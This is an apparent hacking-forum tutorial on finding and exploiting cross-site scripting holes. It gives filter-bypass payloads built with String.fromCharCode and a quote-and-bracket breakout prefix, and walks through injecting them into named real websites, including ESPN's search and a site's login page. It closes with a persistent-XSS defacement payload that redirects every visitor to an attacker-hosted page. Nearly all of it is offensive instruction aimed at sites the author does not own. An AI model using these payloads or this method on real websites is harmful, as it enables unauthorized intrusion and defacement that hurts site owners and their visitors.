Find XSS Vuln's Like a Pro

What is XSS ? :

Cross-site scripting holes are web-application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern web browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

Read More at : http://en.wikipedia.org/wiki/Cross-site_scripting

Difference between Persistent and Non-Persistent XSS ? :

There is 2 Type's of XSS : Persistent and Non-Persistent ..

Non-Persistent : It is client sided, when you refresh the Page it will be gone.. It could be also Exploited to get the admin Cookie.. ( i wont be covering it in this tut) ..

Persistent : Server sided stick's to the page, and show's up to every one who visit's the site..

Where To find XSS ? :

XSS Vulnerabilities can be found in Search Box's, Login Page's : They can be found in every text Box that exist on the site's..
For sure, you cant find XSS vuln's on Google homepage Unless if you are lucky.. but it would take up to hour's to find one...

My First XSS Attack :

Before performing Your first XSS Attack, You need to know the Basic's ..

You cant Find XSS Attack's using Google chrome, Because it has an XSS Filter.. so download Fire-Fox !

Downlaod Mozila Here !

In order to find an XSS vuln you need to start your code with :

Code:

<script> </script>

if you are an HTML coder then, this will be easy as fuck for you..

now we need to define what we want the page to display, i this tut i will be covering up Alert Box's ..
There is on mouse Vuln's too.. i May add it to this tut later..

so our code (Base) is :

Code:

<script>alert(Your Text Here)</script>

for sure, and iam sure as fuck.. you wont find an XSS vuln on any website using this code..
Here come's the turn of the ByPassing..

How to ByPass XSS Filter's ?

There is 2 way's on how to ByPass XSS Filter in the search Bar's..
The most common one is using StringForCharCode ..
i will be covering that, and i may add other method's later..

StringFromCharCode method converts Unicode values into characters.

ByPassing Filter's :

First of all, Make sure you have Mozilla firefox.. You will need the Hack-Bar addon..
Here is the download Link :

Press me to download The Hack-Bar Mozilla Addon

Make sure, you are on Mozilla while downloading it..

Now, When u finished installing the Hack-Bar..
Re-start Mozilla fire-fox..

You will notice that the Bar is Installed, it should like like this :



so, basically i will be showing you how to find XSS on Website's..
i will be using http://www.search-results.com ..
when ever i type something stupid into the URL Bar, i get directed to it..

So, i will be using it as my target..

Now Let's start..

Go to the hack bar, XSS Tab And StringForChar() Press it and enter Your text :



i entered TwinBlade-HF when you are done, Press Ok..

now, as i have stated Above.. the base is our key to Find XSS Vuln's..

and our Base was :

Code:

<script>alert(TwinBlade-HF)</script>

i guess it's obvious, the above code does not work?
Replace it with our string Function..

here is our base :

Code:

<script>alert()</script>

so, instead of the (text_here) we enter our StringFromChar() Text..

so, we can simple bypass the Filter..
it will look like :

Code:

<script>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</script>

Notice we have Made the StringFromCharCode() as text.. So at beginning of the StringFromCharCode() we Put a : Bracket

Code:

(

and there must be 2 Bracket's at the end of it..

Now, let's Find some vuln's on our Target :

Code:

www.search-results.com

Copy the above code and Head towards :

http://www.search-results.com/

And insert it at the main Page ..

and there Result is :



Yeah, You just got trolled by the website..
Here come's the part on How to find XSS Vuln's Like a pro..

How to Find XSS Vulnerabilities like a Pro.

So, basically when i ever i type something in ur URL Bar, which isn't a website link..

it direct's me to it : http://www.search-results.com/

I am sure, you know what i mean..

Go go Go ! Enter your StringFromCharCode() Code into the URL Bar directly..

And Here is our Result ! :



Loosing Hope Ha ?

Don't ! Cap's Lock Button !

Here is my point :

Code:

<script>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</script>

Goes to :

Code:

<SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

Try it, and you will simply Fail !

Try adding some Char and symbol's at the Beginning :

Code:

<SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

Goes to :

Code:

";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

and try entering it at the URL Bar, as i said it will redirect You to search-Result

But, iam sure you will notice the Change :



But, if you tried entering it directly at the search HomePage.. then it won't work.. :



Now, this was one of the technique's .. Here is another One :

You can't Only, find XSS Vuln's at search Bar's..
as i told you before, it could by an textbox that the Box Include..
Now for this example i will use http://search.espn.go.com/

Don't worry, i havr reported it.. But lazy Bastard's is Lazy
Did not even reply or fix it, so i will be using it in this Tutorial...

Go to :

http://search.espn.go.com/

Type anything in the search Bar, Something like test..

If you tried putting our XSS Statement directly.. It will give u an error..

So, here come's the trick...

Here is Our weapon :

Code:

";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

And here is our Target :



Try entering our weapon in the search :



Yeah, You Got trolled.. ..

But in case you Have Not Notice, There is another text-box here.. :



why dont u Go enter our weapon there? And then press enter? :



Woot ! XSS ON Espn ..

Now, i will be mentioning another One ..

i will be using http://tumblrstation.com/ as a Target..

Now, i cant see any search text-Box's..

and for sure, login page is not only for user's to Login :P

Here, as there is no search Box's

Go to the Login page :

http://tumblrstation.com/user/login

and inject it with our code :

Code:

";><SCRIPT>alert(String.fromCharCode(84, 119, 105, 110, 66, 108, 97, 100, 101, 45, 72, 70))</SCRIPT>

WOOT ! that was simple right?

Now, i may add more technique's/method's/way's Later On..

Defacing a website ? :


For defacing a website using XSS, Now before giving you the Code..
let me tell you something, you cant deface a website using Non-Persistent, You can deface it using an Persistent XSS Vulnerabilities ..

Persistent are Rare to Find, you will be lucky if you found One..

As i said before, Persistent XSS Vuln's show's up for every One :

Code:

<script>window.location="http://www.PasteHtml.com/DefaceCodeHere/";</script>

The code, pretty Much explain's itself.. Now.. You need a deface Page to deface a website that's Logic

Host, your deface Page at http://www.pastehtml.com

To Make one, you need to know HTML Coding..

Good Luck.. :D

Source: http://www.hackforums.net/showthread.php?tid=2539599&highlight=XSS+Tutorial